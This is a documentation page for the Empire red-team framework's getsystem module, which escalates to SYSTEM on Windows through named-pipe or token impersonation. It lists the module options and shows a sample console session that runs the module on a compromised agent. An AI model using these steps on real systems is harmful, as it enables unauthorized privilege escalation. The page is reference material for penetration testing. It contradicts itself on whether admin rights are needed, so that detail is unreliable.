Get-System - Empire Module
This page contains detailed information about how to use the powershell/privesc/getsystem Empire module. For list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: Get-System
Module: powershell/privesc/getsystem
Source code [1]: empire/server/modules/powershell/privesc/getsystem.yaml
Source code [2]: empire/server/data/module_source/privesc/Get-System.ps1
MITRE ATT&CK:
T1103, S0194
Language: PowerShell
Needs admin: Yes
OPSEC safe: No
Background: No
The getsystem module gets SYSTEM privileges with one of two methods.
This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.
Note that the getsystem module does not need administrative privileges to work properly which means that a normal user can run this module.
Required Module Options
This is a list of options that are required by the getsystem module:
Agent
Agent to run module on.
Additional Module Options
This is a list of additional options that are supported by the getsystem module:
OutputFunction
PowerShell's output function to use ("Out-String", "ConvertTo-Json", "ConvertTo-Csv", "ConvertTo-Html", "ConvertTo-Xml").
Default value: Out-String
.
Suggested values: Out-String
, ConvertTo-Json
, ConvertTo-Csv
, ConvertTo-Html
, ConvertTo-Xml
.
PipeName
Optional pipe name to used for 'NamedPipe' impersonation.
RevToSelf
Switch. Reverts the current thread privileges.
ServiceName
Optional service name to used for 'NamedPipe' impersonation.
Technique
Technique to use, 'NamedPipe' for service named pipe impersonation or 'Token' for adjust token privs.
Default value: NamedPipe
.
WhoAmI
Switch. Display the credentials for the current PowerShell thread.
Getsystem Example Usage
Here's an example of how to use the getsystem module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/privesc/getsystem
Author @harmj0y
@mattifestation
Background False
Comments https://github.com/rapid7/meterpreter/blob/2a891a79001fc43cb25475cc43b
ced9449e7dc37/source/extensions/priv/server/elevate/namedpipe.c
https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot
http://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-
getsystem/
http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-
impersonation/
Description Gets SYSTEM privileges with one of two methods.
Language powershell
Name powershell/privesc/getsystem
NeedsAdmin True
OpsecSafe False
Software http://attack.mitre.org/software/S0194
Techniques http://attack.mitre.org/techniques/T1103
,Record Options--,------------,----------,-------------------------------------,
| Name | Value | Required | Description |
|----------------|------------|----------|-------------------------------------|
| Agent | | True | Agent to run module on. |
|----------------|------------|----------|-------------------------------------|
| OutputFunction | Out-String | False | PowerShell's output function to use |
| | | | ("Out-String", "ConvertTo-Json", |
| | | | "ConvertTo-Csv", "ConvertTo-Html", |
| | | | "ConvertTo-Xml"). |
|----------------|------------|----------|-------------------------------------|
| PipeName | | False | Optional pipe name to used for |
| | | | 'NamedPipe' impersonation. |
|----------------|------------|----------|-------------------------------------|
| RevToSelf | | False | Switch. Reverts the current thread |
| | | | privileges. |
|----------------|------------|----------|-------------------------------------|
| ServiceName | | False | Optional service name to used for |
| | | | 'NamedPipe' impersonation. |
|----------------|------------|----------|-------------------------------------|
| Technique | NamedPipe | False | Technique to use, 'NamedPipe' for |
| | | | service named pipe impersonation or |
| | | | 'Token' for adjust token privs. |
|----------------|------------|----------|-------------------------------------|
| WhoAmI | | False | Switch. Display the credentials for |
| | | | the current PowerShell thread. |
'----------------'------------'----------'-------------------------------------'
(Empire: usemodule/powershell/privesc/getsystem) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/privesc/getsystem) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come.
Authors
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/privesc/getsystem.yaml
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/data/module_source/privesc/Get-System.ps1
- https://github.com/rapid7/meterpreter/blob/2a891a79001fc43cb25475cc43bced9449e7dc37/source/extensions/priv/server/elevate/namedpipe.c
- https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot
- http://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
- http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/
- http://attack.mitre.org/software/S0194
- http://attack.mitre.org/techniques/T1103
- http://www.exploit-monday.com/2012/05/accessing-native-windows-api-in.html
- http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx
- http://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
See Also
Check also the following modules related to this module:
- powershell/privesc/bypassuac
- powershell/privesc/bypassuac_env
- powershell/privesc/bypassuac_tokenmanipulation
- powershell/privesc/winPEAS
- powershell/privesc/sweetpotato
- powershell/privesc/tater
- powershell/privesc/ms16-135
- powershell/privesc/ask
- powershell/privesc/bypassuac_wscript
- powershell/privesc/mcafee_sitelist
- powershell/privesc/privesccheck
- powershell/privesc/sherlock
- powershell/privesc/ms16-032
- powershell/privesc/bypassuac_eventvwr
- powershell/privesc/zerologon
- powershell/privesc/printdemon
- powershell/privesc/gpp
- powershell/privesc/bypassuac_sdctlbypass
- powershell/privesc/watson
- powershell/privesc/bypassuac_fodhelper
- powershell/privesc/printnightmare
- powershell/privesc/powerup/service_exe_useradd
- powershell/privesc/powerup/write_dllhijacker
- powershell/privesc/powerup/service_stager
- powershell/privesc/powerup/service_exe_restore
- powershell/privesc/powerup/service_exe_stager
- powershell/privesc/powerup/find_dllhijack
- powershell/privesc/powerup/service_useradd
- powershell/privesc/powerup/allchecks
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.